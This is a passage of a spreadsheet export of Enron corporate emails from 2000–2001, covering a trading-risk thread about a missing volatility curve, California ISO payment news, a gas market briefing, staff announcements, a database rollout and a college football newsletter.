morning.  Pal is still whining a bit.  I brought one of our puppy books to _x000D_
the office, and I'll sneak a peak when I can.  I did read about the up at _x000D_
night stuff, and it says that so long as you don't let them get in bed with _x000D_
you, the whining should stop pretty quickly.  I hope the resting on the chest _x000D_
didn't mess it up, but boy, was I desperate.  He did great using the grass _x000D_
when we got up.  He definitely knows why we go outside._x000D_
_x000D_
Kaley picked on him a little, but she was at her food bowl.  I set up the _x000D_
little crate where she can't look in it, so he has an escape.  We should walk _x000D_
the perimeter to make sure there aren't any escape routes.  We probably need _x000D_
to protect the air conditioner wires until he is old enough to train to the _x000D_
electronic fence._x000D_
_x000D_
Thanks for taking the pig rat back. _x000D_
_x000D_
Love,_x000D_
_x000D_
ckm</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 13:42:09 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: NGI-MALIN</t>
  </si>
  <si>
    <t>what is this?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Keiser, Kam  _x000D_
Sent:	Thursday, October 25, 2001 2:47 PM_x000D_
To:	McLaughlin Jr., Errol_x000D_
Subject:	FW: NGI-MALIN_x000D_
_x000D_
Errol,_x000D_
_x000D_
Do you know if the trade below Frank is talking about was booked to NGI-Malin or to another curve.  His concern is that there isn't a volatility curve set and the P&amp;L/Positions may be off.  _x000D_
_x000D_
KK_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Thursday, October 25, 2001 2:10 PM_x000D_
To:	Gossett, Jeffrey C.; Keiser, Kam_x000D_
Cc:	Khanna, Bharat_x000D_
Subject:	FW: NGI-MALIN_x000D_
_x000D_
Bharat was digging around in ERMS and noticed that NGI-Malin is missing a vol curve.. _x000D_
The immediate concern was gas VAR, and think I'm, okay given below?_x000D_
The second concern is Larry May._x000D_
Larry booked $8MM last week on SoCal option trade.  The question I have is where is his vol curve?  How can he book $8MM when he isn't even posting a vol curve for Malin?was his trade elsewhere_x000D_
Can you all noodle around for me?_x000D_
Thanks_x000D_
Frank_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Jia, Winston  _x000D_
Sent:	Thursday, October 25, 2001 1:47 PM_x000D_
To:	Hayden, Frank_x000D_
Cc:	Khanna, Bharat_x000D_
Subject:	RE: NGI-MALIN_x000D_
_x000D_
_x000D_
Frank,_x000D_
_x000D_
For all gas basis curves, if it does not have its own vol, then NG Nymex Vol will be used._x000D_
_x000D_
Regards,_x000D_
_x000D_
Winston_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hayden, Frank  _x000D_
Sent:	Thursday, October 25, 2001 1:08 PM_x000D_
To:	Jia, Winston_x000D_
Cc:	Khanna, Bharat_x000D_
Subject:	NGI-MALIN_x000D_
_x000D_
Winston,_x000D_
Bharat meet with Francis Lim regarding ERMS and he learned that NGI-MALIN does not have any vol curve assigned to it.  However when we simulate that curve in ad hoc we don't get any errors.  Can you tell us what vol curve is being used for NGI-Malin in risk trac?_x000D_
Thanks_x000D_
Frank</t>
  </si>
  <si>
    <t>Thu, 6 Dec 2001 15:02:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'kit.blair@enron.com', 'jeff.dasovich@enron.com', 'tim.belden@enron.com', 'paul.kaufman@enron.com', 'chris.mallory@enron.com', 'scotty.gilbert@enron.com', 'jeff.richter@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
FYI_x000D_
-----Original Message-----_x000D_
From: Katie Kaplan [mailto:kaplan@iepa.com]_x000D_
Sent: Thursday, December 06, 2001 2:43 PM_x000D_
To: Alan Comnes (E-mail); Bill Woods (E-mail); Bob Ellery (E-mail);_x000D_
Brian T. Cragg (E-mail); Carolyn A Baker (E-mail); Curtis Hatton_x000D_
(E-mail); Curtis Kebler (E-mail); Parquet, David; 'Dean Nistetter';_x000D_
Douglas Kerner (E-mail); Duane Nelsen (E-mail); 'Ed Wheless'; Eric_x000D_
Eisenman (E-mail); George Vaughn (E-mail); Greg Blue (E-mail); Jack_x000D_
Pigott (E-mail); 'JoAnn Van Buren'; Joe Ronan (E-mail); John G. Larrea_x000D_
(E-mail); Karen Shea (E-mail); Ken Hoffman (E-mail); Kent Palmerton_x000D_
(E-mail); Fillinger, Mark; Mark J. Smith (E-mail); Marty McFadden_x000D_
(E-mail); 'Melanie Gillette'; Nam Nguyen (E-mail); 'Rachel King';_x000D_
Randall J. Hickok (E-mail); Roger Pelote (E-mail); Ross Ain (E-mail);_x000D_
Scott Sadler (E-mail); Steve Ponder (E-mail); Steve Schleimer (E-mail);_x000D_
Susan J Mara (E-mail); Tom Hartman (E-mail); Browner, Victor; Ward_x000D_
Scobee (E-mail); 'Alex Sugaoka (E-mail)'; 'Bob Escalante (E-mail)';_x000D_
Gates, Bob; Charles Linthicum (E-mail); 'Cody Carter (E-mail)'; 'Curt_x000D_
Hatton (E-mail)'; 'Dean Gosselin (E-mail)'; 'Ed Tomeo (E-mail)'; 'Eileen_x000D_
Koch (E-mail)'; 'Frank DeRosa (E-mail)'; 'Hap Boyd (E-mail)'; 'Hawks_x000D_
Jack (E-mail)'; 'Jim Willey (E-mail)'; 'Joe Greco (E-mail)'; John Stout_x000D_
(E-mail); 'Jonathan Weisgall (E-mail)'; Kate Castillo (E-mail); 'Kelly_x000D_
Lloyd (E-mail)'; 'Kent Fickett (E-mail)'; 'Lynn Lednicky (E-mail)';_x000D_
Paula Soos (E-mail); 'Stephanie Newell (E-mail)'; Steve Iliff (E-mail);_x000D_
Thomas R. McMorrow (E-mail); William Carlson (E-mail); Andy Brown_x000D_
(E-mail); 'Carol Hudson (E-mail)'; Chris Ellison (E-mail); 'Jan_x000D_
Smutny-Jones (E-mail)'; 'Katie Kaplan (E-mail)'; Kelli Reid (E-mail);_x000D_
Sandra Moseley (E-mail); 'Steven Kelly (E-mail)'_x000D_
Subject: DWR Paid their bills in FULL for FEB 2001_x000D_
Importance: High_x000D_
_x000D_
_x000D_
Greetings_x000D_
A step in the right direction- the CDWR paid their bill in full for the_x000D_
February 2001 trade month._x000D_
_x000D_
The ISO will be disbursing the dollars a week from today.  One other_x000D_
important highlight is that the ISO invoiced the DWR for all charges_x000D_
associated with meeting the net short of the utilities and they did pay in_x000D_
full- we were expecting they would make only a partial payment. I'm glad we_x000D_
were wrong.  We can now hold our breath for the rest of the $$.  Please give_x000D_
me a call with any questions_x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
-----Original Message-----_x000D_
From: CRCommunications [mailto:CRCommunications@caiso.com]_x000D_
Sent: Thursday, December 06, 2001 2:33 PM_x000D_
To: ISO Market Participants_x000D_
Cc: Epstein, Michael; Rostker, Margaret; Fuller, Don_x000D_
Subject: CAISO Notice - California Energy Resource Scheduler (CERS) full_x000D_
payment received for February, 2001 Market transactions_x000D_
_x000D_
MARKET NOTICE_x000D_
December 6, 2001_x000D_
_x000D_
                In Re:  CERS Market payments - February 2001_x000D_
California Energy Resource Scheduler (CERS) full payment received for_x000D_
February, 2001 Market transactions_x000D_
_x000D_
ISO Market Participants:_x000D_
The ISO is pleased to announce that today it received from the California_x000D_
Energy Resource Scheduler (CERS) full payment for amounts due to Market_x000D_
Participants for transactions in February, 2001._x000D_
The ISO will disburse these funds on December 13, 2001._x000D_
_x000D_
Client Relations Communications.1002_x000D_
CRCommunications@caiso.com &lt;mailto:CRCommunications@caiso.com&gt;_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 04:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ken.powers@enron.com', 'jan.moore@enron.com', 'dave.neubauer@enron.com', 'frank.oldenhuis@enron.com', 'larry.swett@enron.com', 'loren.penkava@enron.com', 'john.dushinske@enron.com', 'vernon.mercaldo@enron.com', 'chuck.wilkinson@enron.com', 'steve.gilbert@enron.com', 'courtney.barker@enron.com', 'laura.lantefield@enron.com', 'craig.buehler@enron.com', 'bob.stevens@enron.com', 'jim.wiltfong@enron.com', 'ld.stephens@enron.com', 'kent.miller@enron.com', 'mike.barry@enron.com', 'kay.threet@enron.com', 'mike.mcgowan@enron.com', 'tk.lohman@enron.com', 'lisa.valley@enron.com', 'vicki.berg@enron.com', 'jeff.nielsen@enron.com', 'kevin.hyatt@enron.com', 'julia.white@enron.com', 'tim.johanson@enron.com', 'frank.semin@enron.com', 'allen.cohrs@enron.com', 'penny.mccarran@enron.com', 'jo.williams@enron.com', 'martha.janousek@enron.com', 'sean.bolks@enron.com', 'larry.pavlou@enron.com', 'stephanie.korbelik@enron.com', 'dana.jones@enron.com', 'janet.bowers@enron.com', 'bob.burleson@enron.com', 'reyna.cabrera@enron.com', 'lee.ferrell@enron.com', 'eileen.peebles@enron.com', 'john.fiscus@enron.com', 'kimberly.watson@enron.com', 'steven.harris@enron.com', 'stephen.herber@enron.com', 'sue.neville@enron.com', 'morgan.gottsponer@enron.com', 'don.powell@enron.com', 'steve.weller@enron.com', 'lorraine.lindberg@enron.com', 'lindy.donoho@enron.com', 'michael.stage@enron.com', 'chris.sebesta@enron.com', 'jeffery.fawcett@enron.com', 'theresa.branney@enron.com', 'michelle.lokay@enron.com', 'karen.lagerstrom@enron.com', 'bill.fowler@enron.com', 'joni.bollinger@enron.com'})</t>
  </si>
  <si>
    <t>FW: Monthly Gas Briefing: The Storm Continues - CERA Monthly_x000D_
 Briefing</t>
  </si>
  <si>
    <t>Note:  CERA's February forecast of price and demand._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  webmaster [mailto:webmaster@cera.com] _x000D_
Sent: Tuesday, January 16, 2001 11:21 PM_x000D_
To: messages_x000D_
Subject: Monthly Gas Briefing: The Storm Continues - CERA Monthly Briefing_x000D_
_x000D_
_x000D_
Title: Monthly Gas Briefing: The Storm Continues_x000D_
URL: http://www20.cera.com/eprofile?u=35&amp;m=2199_x000D_
_x000D_
_x000D_
Overview: Although weather has allowed some break in gas prices over the past _x000D_
two weeks,_x000D_
the pressure in the market remains. Storage inventories look likely to reach_x000D_
record low levels by the end of February, with a month of winter still to _x000D_
come._x000D_
This pressure means_x000D_
_x000D_
* The 4.4 Bcf per day of demand currently priced out of the gas market is_x000D_
likely to remain out of the market through February._x000D_
_x000D_
* Henry Hub price is expected to average $8.00 per MMBtu for February._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow above URL for full report._x000D_
_x000D_
*********************************************************_x000D_
Come Shoot the Rapids with us at CERAWeek2001, "Shooting the Rapids:_x000D_
Strategies and Risks for the Energy Future" in Houston, February 12-16, 2001!_x000D_
For more information and to register, please visit_x000D_
http://www20.cera.com/ceraweek/_x000D_
*********************************************************_x000D_
_x000D_
_x000D_
E-mail Category: Monthly Briefing_x000D_
CERA Knowledge Area(s): North American Gas,_x000D_
_x000D_
**********************************************************************_x000D_
To make changes to your cera.com account go to:_x000D_
http://www20.cera.com/client/updateaccount_x000D_
_x000D_
Forgot your username and password? Go to:_x000D_
http://www20.cera.com/client/forgot_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
Terms of Use: http://www20.cera.com/tos_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2000. Cambridge Energy Research Associates</t>
  </si>
  <si>
    <t>Thu, 28 Sep 2000 14:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'frank.semin@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Congrats big guy!  I look forward to showing you the sights in the Big O.  _x000D_
Since that will only take about 10 minutes, we'll have plenty time to go out _x000D_
for a beer afterwords!  DF_x000D_
---------------------- Forwarded by Drew Fossum/ET&amp;S/Enron on 09/28/2000 _x000D_
09:16 PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Bill Fowler                           09/28/2000 11:20 AM_x000D_
	_x000D_
_x000D_
To: Enron Everyone_ET&amp;S_Omaha_x000D_
cc:  _x000D_
_x000D_
Subject: Organizational Announcement_x000D_
_x000D_
I am pleased to announce that Frank Semin has been promoted to Director of _x000D_
Marketing for the Central LDC Team in the Business Development and Marketing _x000D_
Group and will be relocating to the Omaha._x000D_
_x000D_
Frank brings extensive experience to this position having previously worked _x000D_
in Gas Accounting, Financial Planning and most recently as an Account Rep for _x000D_
the North LDC Team._x000D_
_x000D_
Frank received his B.S. from Creighton and Masters in Economics from _x000D_
University of Nebraska at Omaha.  _x000D_
_x000D_
Please join me in congratulating Frank on his new position. _x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 07:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>rushing to a meeting...</t>
  </si>
  <si>
    <t>I thought I would go ahead and give you my cell no._x000D_
281.831.2062_x000D_
_x000D_
b.</t>
  </si>
  <si>
    <t>Tue, 5 Sep 2000 01:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>True Orange Fax/E-Mail #83</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David M Gagliardi/TTG/HouInd on_x000D_
09/05/2000 08:12 AM ---------------------------_x000D_
_x000D_
_x000D_
"Michael Gagliardi" &lt;mggagliardi@duke-energy.com&gt; on 09/05/2000 07:25:38 AM_x000D_
_x000D_
To:   DGagliardi@reliantenergy.com, David_Ricks@GSDM.com_x000D_
cc:_x000D_
_x000D_
Subject:  True Orange Fax/E-Mail #83_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael_x000D_
Gagliardi/Hou-ComOps/EnergyTrading/PEC on 09/05/2000 07:35 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
TruOrange@aol.com on 09/04/2000 10:37:06 PM_x000D_
_x000D_
To:   TruOrange@aol.com_x000D_
cc:    (bcc: Michael Gagliardi/Hou-ComOps/EnergyTrading/PEC)_x000D_
Subject:  True Orange Fax/E-Mail #83_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
True Orange Fax/E-Mail Service_x000D_
Volume 8, Fax/E-Mail #83, Monday, September 4, 2000_x000D_
Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
Phone_x000D_
512-795-8536_x000D_
_x000D_
UT Favored by 45; Brown Says He'll Name QB Just Before Kickoff_x000D_
_x000D_
The Longhorns are 45-point favorites over Louisiana-Lafayette for_x000D_
Saturday's_x000D_
11:30 a.m. season opener in Austin. For those of you who don't live in_x000D_
Austin_x000D_
and who plan to come to the game, this is the hottest summer I have seen in_x000D_
Austin, with temperatures hitting 105, 106 and 107 with disturbing_x000D_
regularity, so I would advise you to wear something cool and arrange to_x000D_
have_x000D_
plenty of liquids to drink._x000D_
The team returned to practice Monday after getting three days off to_x000D_
recuperate from 2-a-days, and freshman WR Roy Williams made a spectacular_x000D_
catch of a ball that looked like it was over everyone._x000D_
Coach Mack Brown said he won't name a starting quarterback publicly until_x000D_
the_x000D_
game starts, and won't even break the news to Major Applewhite and Chris_x000D_
Simms, the two quarterbacks who are competing for the starting job, until_x000D_
Saturday morning. "We want to watch them in practice all week," Brown said._x000D_
He also said both QBs are working hard and competing for the starting job._x000D_
"We have told our team we have two starters," Brown said. "We are just_x000D_
happy_x000D_
they are both really good. In making these decisions, we will try to take_x000D_
care of both of them and do what is best for the team."_x000D_
All of the injured starters who missed some time last week were back at_x000D_
practice Monday, but they didn't run with the first team. Brown said, "as_x000D_
of_x000D_
today," redshirt freshman Tillman Holloway would start at left guard_x000D_
because_x000D_
Derrick Dockery missed most of last week, sophomore Cole Pittman would_x000D_
start_x000D_
ahead of Cory Redding at DE because Redding was injured last week, and_x000D_
Roderick Babers, who is locked in a battle with Ervis Hill, at CB, would_x000D_
get_x000D_
the nod because Hill missed some workouts with an injury._x000D_
But the game isn't today, and Brown said the players who were hurt will_x000D_
have_x000D_
an opportunity this week to regain their starting jobs._x000D_
Brown also said he hasn't decided whether to start any true freshmen, and_x000D_
said he probably won't make a final decision on that until close to game_x000D_
time, too, "because sometimes you tell a freshman he is going to start, and_x000D_
he starts hyperventilating."_x000D_
Whether or not they start, freshman WRs Williams and B. J. Johnson will_x000D_
play_x000D_
early and often. They are the most impressive freshmen wide receivers I_x000D_
have_x000D_
seen at Texas. Mike Adams and Lovell Pinkney were a very good pair, but_x000D_
Williams and Johnson look better, and Sloan Thomas and Tony Jeffery, the_x000D_
other two freshmen WRs, aren't too far behind. Defensive coordinator Carl_x000D_
Reese also says freshman CB Nathan Vasher and freshman DE Kalen Thornton_x000D_
will_x000D_
play Saturday._x000D_
RECRUITING NOTES: Greg Barnum, the center from Killeen Ellison who left_x000D_
Tennesse and considered transferring to Texas, enrolled at Stephen F._x000D_
Austin_x000D_
and says he plans to stay there for the remainder of his career. . . DE_x000D_
Eric_x000D_
Hall of Clarksville, Tenn., says he is still planning to take his official_x000D_
visit to Texas this weekend, and super DT Tommie Harris of Killeen Ellison_x000D_
heads the list of high school stars who plan to come to the UT game on_x000D_
unofficial visits. . . Shreveport Evangel's 60-game winning streak ended_x000D_
Saturday when Marrero Shaw took a 22-19 victory. Evangel QB Brett Rawls,_x000D_
6-5,_x000D_
200, completed 19 of 37 passes for 238 yards and three touchdowns in a_x000D_
losing_x000D_
effort. Rawls and Matt Nordgren, 6-5, 225, of Dallas Bishop Lynch, are UT's_x000D_
top QB targets this recruiting season._x000D_
BASKETBALL RECRUITING  NOTES: The Longhorn women got a commitment Monday_x000D_
from_x000D_
the state's top prospect, Heather Schrieber, a  6-2 forward from_x000D_
Windthrost,_x000D_
a small town near Wichita Falls. Schrieber, who had offers from top schools_x000D_
all over the country after a great summer season in AAU ball, had narrowed_x000D_
her choices to Texas and Iowa State, and she visited the Cyclones last_x000D_
weekend, then came home and called the Texas coaches to say she wants to_x000D_
play_x000D_
for the Longhorns. "I just really like Texas," she said. Joel Nelson of_x000D_
Flower Mound, who coached her in AAU play this summer, said, "Heather is a_x000D_
great player. She can bring the ball down court, she hit 46% of her_x000D_
three-pointers for us and she was the best player on an AAU team that_x000D_
finished fourth in the country. She could play guard, forward or center at_x000D_
the college level and be very good at any of those positions. I know teams_x000D_
like Texas Tech, Arkansas, Iowa State and several others wanted her, too. I_x000D_
think she's the best player in the state." He said she averaged 18 points,_x000D_
13_x000D_
rebounds and 6 assists in a 60-game AAU season against top players from 4A_x000D_
and 5A schools._x000D_
My next fax will be whenever events warrant._x000D_
* * * *_x000D_
The True Orange Fax Service includes  at  least  99 faxes  a year and costs_x000D_
$99 ($79 by E-Mail). The True Orange Newsletter includes  26 newsletters_x000D_
and_x000D_
is published weekly during football season and twice monthly during most of_x000D_
the other months. It costs $45. Save by subscribing to both for $130 (or_x000D_
$110_x000D_
if you take the faxes via E-Mail  or $99 if you take the faxes and_x000D_
newsletter_x000D_
via E-Mail). Send check  to address at the top of page. I also  update my_x000D_
900 number_x000D_
_x000D_
- 1-900-288-8839_x000D_
- frequently with recruiting news. My E-Mail_x000D_
address is: truorange@aol.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 3 Jan 2000 01:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>John, I thought I would send you a note to outline our conversation re. David _x000D_
Redmond.  Dave will return to the London office in late May.  In late _x000D_
February we will pinpoint the group/job that will best suit Dave and Enron.  _x000D_
All efforts will be made to get Dave an option trading related position. _x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
John Lavorato</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 03:46:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Thxs Greg_x000D_
_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 06/27/2000 _x000D_
10:46 AM ---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Greg Piper @ ENRON                           06/27/2000 10:41 AM_x000D_
	_x000D_
_x000D_
To: David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
I filled out in the PEP system a performance review on Edward Ondarza and _x000D_
Rodney Malcolm and submitted them.  Let me know if you didn't get them or if _x000D_
you wish to discuss._x000D_
_x000D_
Thanks._x000D_
_x000D_
GP_x000D_
</t>
  </si>
  <si>
    <t>Mon, 13 Nov 2000 06:24:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.solmonson@enron.com', 'brent.price@enron.com', 'james.scribner@enron.com', 'sheri.thomas@enron.com', 'peggy.hedstrom@enron.com', 'd.hall@enron.com', 'kevin.sweeney@enron.com', 'sally.beck@enron.com', 'scott.mills@enron.com', 'leslie.reeves@enron.com', 'sheila.glover@enron.com', 'brenda.herod@enron.com', 'thomas.myers@enron.com', 'bob.hall@enron.com'})</t>
  </si>
  <si>
    <t>Rollout of ATHENA (Formerly known as the DPR database)</t>
  </si>
  <si>
    <t xml:space="preserve">Athena is a powerful and flexible tool.  The members of RAC have shown great _x000D_
interest in Athena, and we should expect to see several of them at today's _x000D_
instructional class.  _x000D_
_x000D_
We think that Energy Operations will similarly find Athena very useful, and _x000D_
we strongly encourage you to sign up for Thursday's class or to stop by _x000D_
today's (4:00 in EB 3270)._x000D_
_x000D_
Regards,_x000D_
_x000D_
_x000D_
_x000D_
Eugenio_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Eugenio Perez/HOU/ECT on 11/13/2000 02:11 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
_x000D_
Maria Teresa Aguilera-Peon_x000D_
11/03/2000 03:51 PM_x000D_
To: Sally Beck/HOU/ECT@ECT, Bob M Hall/NA/Enron@Enron, Peggy _x000D_
Hedstrom/CAL/ECT@ECT, Brenda F Herod/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT, _x000D_
Stacey W White/HOU/ECT@ECT, Scott Mills/HOU/ECT@ECT, James _x000D_
Scribner/Corp/Enron@Enron, Mary Solmonson/HOU/ECT@ECT, Sheri _x000D_
Thomas/HOU/ECT@ECT, Scott Earnest/HOU/ECT@ECT, Sheila Glover/HOU/ECT@ECT, D _x000D_
Todd Hall/HOU/ECT@ECT, Thomas Myers/HOU/ECT@ECT, Brent A Price/HOU/ECT@ECT, _x000D_
Kevin Sweeney/HOU/ECT@ECT_x000D_
cc: Shona Wilson/NA/Enron@Enron, Eugenio Perez/HOU/ECT@ECT _x000D_
_x000D_
Subject: Rollout of ATHENA (Formerly known as the DPR database)_x000D_
_x000D_
_x000D_
Dear All,_x000D_
 _x000D_
Risk Analytics, has recently finished developing ATHENA (the database that _x000D_
warehouses all of the official DPR data of Enron), which is designed to make _x000D_
your work easier by giving you the following tools and breakdowns:_x000D_
_x000D_
1. P&amp;L Component Breakdowns_x000D_
? Hedge Management_x000D_
? Prudency_x000D_
? Curve Shift_x000D_
? New Deals_x000D_
_x000D_
2. Risk Analysis Tools_x000D_
? VARs_x000D_
? Maturity Gap Risk_x000D_
? Net Open Position_x000D_
? Daily loss limits_x000D_
_x000D_
The warehoused information, which is broken down by books and parts (P&amp;L _x000D_
component breakdowns/risk analysis tools), now has the visual aid of numerous _x000D_
bar graphs and pie charts used to represent the information listed above - _x000D_
provided to you at the touch of a button.  These charts are not only very _x000D_
easy to understand, but will be helpful in your daily work analyzing trading _x000D_
information.  _x000D_
_x000D_
Now that all commodity groups are performing additional analysis and _x000D_
providing reports other than P&amp;L and positions to both MRM RAC and commercial _x000D_
departments, the tools provided by ATHENA have been proven to be extremely _x000D_
useful.  _x000D_
_x000D_
ATHENA makes analysis of the time trend of data an effortless process, as it _x000D_
has warehoused data for the past year for each commodity._x000D_
_x000D_
The rollout of ATHENA is currently underway, according to the following _x000D_
timeline:_x000D_
_x000D_
? From now until Friday November 10th, access to the database is being given _x000D_
to the beta testers (testers already chosen)._x000D_
? Monday November 13th - First instructional training class from 4-5pm. _x000D_
Conference room 3270._x000D_
? Thursday November 16th - Second instructional training class from 3-4pm.  _x000D_
Conference room 3270.  _x000D_
? Subsequent classes will be scheduled depending on need._x000D_
? Production users will have access to the database within the few weeks _x000D_
following November 16th._x000D_
  _x000D_
Each of these sessions will hold up to 15 participants, and attendees are _x000D_
taken on a first come first serve basis.  Please contact Pamela Sonnier (ext. _x000D_
37531) to sign up for one of these training sessions._x000D_
_x000D_
We expect that all business controllers will want to have access to ATHENA. _x000D_
Additionally, there may be other employees in your group who need access.  _x000D_
Please send all requests for access to ATHENA to Maria Teresa Aguilera-Peon _x000D_
(ext. 35257), Jennifer Nguyen (ext. 57590), or Eugenio Perez (ext. 35828) _x000D_
_x000D_
For further information on ATHENA, or to set up a one on one demonstration, _x000D_
call Eugenio Perez (X35828), Maria Teresa Peon (X35257) or Jennifer Nguyen _x000D_
(X57590)._x000D_
_x000D_
Best regards and looking forward to working with you,_x000D_
_x000D_
_x000D_
Risk Analytics_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 07:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Yeah right!  Nice try - Geek!</t>
  </si>
  <si>
    <t>Thu, 29 Mar 2001 08:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'benjamin.rogers@enron.com', 'miguel.garcia@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'rudy.acevedo@enron.com', 'joe.errigo@enron.com', 'greg.trefz@enron.com', 'chad.starnes@enron.com', 'dean.laurent@enron.com', 'kayne.coulter@enron.com', 'richard.hrabal@enron.com', 'juan.hernandez@enron.com', 'keller.mayeaux@enron.com', 'doug.miller@enron.com', 'steve.olinde@enron.com', 'joe.stepenovitch@enron.com', 'cyril.price@enron.com'})</t>
  </si>
  <si>
    <t>SPP PROPOSED TRANSMISSION LINES</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Christopher Watts/NA/Enron on 03/29/2001 _x000D_
04:04 PM ---------------------------_x000D_
_x000D_
_x000D_
"Chris Watts" &lt;cwatts3@houston.rr.com&gt; on 03/29/2001 01:55:28 PM_x000D_
To: &lt;christopher.watts@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: SPP PROPOSED TRANSMISSION LINES_x000D_
_x000D_
  _x000D_
DJ Southwest Power Pool To Study 6 New Transmission Lines _x000D_
Copyright , 2001 Dow Jones &amp; Company, Inc. _x000D_
_x000D_
HOUSTON (Dow Jones)--A working group within the Southwest Power Pool _x000D_
identified six new transmission lines with an estimated price tag of $240 _x000D_
million needed to ease the region's constrained high-voltage grid. _x000D_
     Last week, the SPP work group voted to proceed with a more detailed _x000D_
analysis of each project. Most of the new lines would take at least three _x000D_
years to develop and build. _x000D_
     The projects include: _x000D_
     - A 60-mile, 345-kilovolt line in northern Missouri running from the _x000D_
Fairhope substation to Sibley substation. Cost: $22.2 million. _x000D_
     - A 30-mile, 345-kv line in eastern Kansas running from Wolf Creek _x000D_
Nuclear Power Station to the Lang substation. Cost: $23.8 million. _x000D_
     - A 32-mile, 345-kv line in northern Oklahoma running from the Sooner _x000D_
Power Station to the Cleveland substation. Cost: $23.8 million. _x000D_
     - A 275-mile, 345-kv line in northern Texas and central Oklahoma _x000D_
connecting the Potter substation to Northwest substation. Cost: $79.2 _x000D_
million. _x000D_
     - A 50-mile, 230-kv line in southern Louisiana running from Cajun Power _x000D_
Station to Coughlin Power Station. Cost: $37.4 million. _x000D_
     - A 70-mile, 345-kv line in northern Arkansas running from St. Francis _x000D_
Power station to Independence Power Station Cost: $57.3 million. _x000D_
     SPP's transmission assessment working group has been meeting to identify _x000D_
needed system upgrades since March 2000. _x000D_
     A total of 23 known system constraints were analyzed. Seventeen upgrade _x000D_
options were studied for their potential to benefit bulk system transfer _x000D_
capability. _x000D_
     The working group identified the six new transmission lines as the most _x000D_
beneficial, officials said. _x000D_
     Detailed analysis of each new line and further recommendations will be _x000D_
made to the SPP engineering and operating committeein the fall. _x000D_
     Currently, SPP has some 50,000 miles of transmission lines and requests _x000D_
more than 11,000 megawatts of new generation to be constructed during the _x000D_
next three years in the eight-state region, said SPP President John _x000D_
Marschewski. _x000D_
     "As a result, there will be a need for new transmission lines," he said. _x000D_
     SPP, which seeks to gain final approval of its regional transmission _x000D_
organization this week from federal regulators, is ready to move forward to _x000D_
coordinate the planning process for new transmission, said Marschewski. _x000D_
     The SPP grid is often paralyzed by transmission-line relief requests _x000D_
from utilities, particularly in the spring when seasonal generation outages _x000D_
occur, said Marschewski. _x000D_
     While the regional council has attempted to put incentives in the market _x000D_
to encourage generation redispatch to avoid TLR events, "those options _x000D_
haven't been exercised to any significant amount so far," said Marschewski. _x000D_
     SPP has worked to coordinate generation outages to minimize problems, _x000D_
but if the region sees plant outages this summer, TLR events could occur, he _x000D_
said. _x000D_
     SPP includes Kansas and Oklahoma and parts of Arkansas, Louisiana, New _x000D_
Mexico, Mississippi, Missouri and Texas. _x000D_
     -By Eileen O'Grady, Dow Jones Newswires; 713-547-9213; _x000D_
mailto:eileen.ogrady@dowjones.com _x000D_
     (END) Dow Jones Newswires 27-03-01 _x000D_
     1605GMT _x000D_
 _x000D_
Enron_x000D_
Analyst, East Power Desk_x000D_
1400 Smith St._x000D_
Houston, TX 77002-7361_x000D_
ph:  713-853-4292_x000D_
christopher.watts@enron.com_x000D_
fax:  713-345-7384_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Oct 2001 22:33:02 -0700 (PDT)</t>
  </si>
  <si>
